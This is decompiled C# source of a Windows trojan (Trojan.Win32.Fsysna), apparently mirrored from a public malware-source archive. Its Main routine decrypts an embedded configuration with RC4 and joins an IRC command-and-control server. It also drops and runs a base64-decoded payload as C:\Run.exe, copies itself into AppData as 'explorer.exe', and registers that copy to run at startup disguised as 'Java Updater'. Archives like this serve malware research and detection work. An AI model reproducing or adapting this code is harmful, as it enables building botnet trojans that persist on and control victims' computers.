mirror of
https://github.com/vxunderground/MalwareSourceCode.git
synced 2024-12-22 11:26:11 +00:00
45 lines
1.7 KiB
C#
45 lines
1.7 KiB
C#
|
// Decompiled with JetBrains decompiler
|
|||
|
// Type: Refx.Main
|
|||
|
// Assembly: Refx, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
|
|||
|
// MVID: 5DD4C44F-C748-4813-B398-D3DE520CF41A
|
|||
|
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Trojan.Win32.Fsysna.bezr-e553a7902dd2b2c973a97028cc8dc7f1bb82c18b1266abf90d2140ec0b5b3a01.exe
|
|||
|
|
|||
|
using Microsoft.VisualBasic;
|
|||
|
using Microsoft.VisualBasic.CompilerServices;
|
|||
|
using System;
|
|||
|
using System.Diagnostics;
|
|||
|
using System.Runtime.CompilerServices;
|
|||
|
|
|||
|
namespace Refx
|
|||
|
{
|
|||
|
[StandardModule]
|
|||
|
internal sealed class Main
|
|||
|
{
|
|||
|
private static clsIRC ClsIRC = new clsIRC();
|
|||
|
|
|||
|
[STAThread]
|
|||
|
[MethodImpl(MethodImplOptions.NoInlining | MethodImplOptions.NoOptimization)]
|
|||
|
public static void Main()
|
|||
|
{
|
|||
|
string[] strArray = Strings.Split(modRC4.rc4(modEOF.ReadEOFData(ref modEOF.SELF_EXE), "02112011"), "!@!");
|
|||
|
string folderPath = Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData);
|
|||
|
if (Information.UBound((Array) strArray) <= 4)
|
|||
|
return;
|
|||
|
if (Operators.CompareString(Strings.UCase(Strings.Right(modEOF.SELF_EXE, 12)), "EXPLORER.EXE", false) == 0)
|
|||
|
{
|
|||
|
modAuth.OWNER = strArray[5];
|
|||
|
Refx.Main.ClsIRC.SetIRCConfig(strArray[1], Conversions.ToInteger(strArray[2]), strArray[3], strArray[4]);
|
|||
|
Refx.Main.ClsIRC.StartIRC();
|
|||
|
}
|
|||
|
else
|
|||
|
{
|
|||
|
modBase64.DecodeData(strArray[6], "C:\\Run.exe");
|
|||
|
Process.Start("C:\\Run.exe");
|
|||
|
FileSystem.FileCopy(modEOF.SELF_EXE, folderPath + "\\explorer.exe");
|
|||
|
modRegister.StartUpInstall("Java Updater", folderPath + "\\explorer.exe", true);
|
|||
|
Process.Start(folderPath + "\\explorer.exe");
|
|||
|
}
|
|||
|
}
|
|||
|
}
|
|||
|
}
|